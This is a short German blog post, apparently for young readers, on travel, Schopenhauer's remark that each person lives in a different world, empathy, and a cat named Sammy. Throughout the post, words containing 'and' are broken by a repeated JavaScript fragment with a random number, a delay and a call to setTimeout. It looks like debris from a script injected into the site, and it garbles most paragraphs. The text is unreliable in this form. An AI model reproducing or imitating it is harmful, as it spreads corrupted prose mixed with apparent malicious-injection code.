Reist du gerne? Hast du unsere Welt schon ein bisschen kennengelernt?

Auf Reisen lernt man ganz verschiedene Menschen kennen…Menschen, die etwas andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anderes essen, die andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anders wohnen, eine andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andere Sprache sprechen, andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andere Gewohnheiten haben als du.  Was sie mögen und verabscheuen, ist andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anders, wovon sie träumen, was ihnen weh tut und was ihnen gut tut vielleicht auch. Eine Vielfalt von Menschen hat eine Vielfalt von Gedanken, Gefühlen, Lebensweisen. Und doch leben wir Menschen, die wir so verschieden sind, auf derselben Erde… und wir haben diesselben Wünsche und Bedürfnisse nach Liebe, Nahrung, Wärme, Freude…

Leben wir allerdings wirklich alle in derselben WELT? Sind wir gleich und leben auf der gleichen Welt oder sind wir verschieden und leben in verschiedenen Welten?

Der Philosoph Arthur Schopenhauer meinte:

 

Bei gleicher Umgebung lebt doch jeder in einer andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anderen Welt.

 

Was bedeutet das? Schopenhauer spricht von Menschen in der gleichen Umgebung, also den Menschen um dich herum. Sie leben in einer andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anderen Welt? Inwiefern?

Hast du dich schon öfters in einen andom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anderen Menschen hineinversetzt? Konntest du Einblick in seine Welt gewinnen? Hast du versucht, die Dinge aus seiner Perspektive zu sehen? Hast du versucht, ihn zu verstehen? Wie hast du das gemacht?

Wie kann das gelingen? Was meinst du, ist dabei nötig?

 

 

Unser Philosophenkater Sammy scheint zu  merken, wenn es jemandom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}anden schlecht geht. Dann kommt er, setzt sich auf seine Schoß und …

 

Sammy (Bild: privat)Sammy (Bild: privat)

…schnurrt und kuschelt besonders ausgiebig!

 

Comments are closed.